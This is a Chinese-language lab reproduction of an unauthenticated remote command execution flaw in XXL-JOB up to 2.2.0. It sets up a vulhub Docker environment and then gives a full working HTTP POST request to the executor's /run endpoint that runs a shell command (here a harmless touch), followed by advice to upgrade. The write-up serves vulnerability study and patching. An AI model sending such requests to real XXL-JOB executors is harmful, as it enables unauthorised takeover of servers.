漏洞概述
XXL-JOB是一个轻量级分布式任务调度平台。默认情况下XXL-JOB的API接口没有配置认证措施,未授权的攻击者可构造恶意请求,触发反序列化,造成远程执行命令
影响版本
XXL-JOB <= 2.2.0
环境搭建
进入目录
cd vulhub-master/xxl-job/unacc/
启动2.2.0版本的XXL-JOB
docker-compose up -d
http://your-ip:8080是管理端(admin)
http://your-ip:9999是客户端(executor)
漏洞复现
向客户端发送数据包
POST /run HTTP/1.1
Host: 192.168.204.131:9999
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 365
{
"jobId": 1,
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 1,
"logDateTime": 1586629003729,
"glueType": "GLUE_SHELL",
"glueSource": "touch /tmp/success",
"glueUpdatetime": 1586699003758,
"broadcastIndex": 0,
"broadcastTotal": 0
}
返回200,说明touch /tmp/success已成功执行
修复建议
升级到安全版本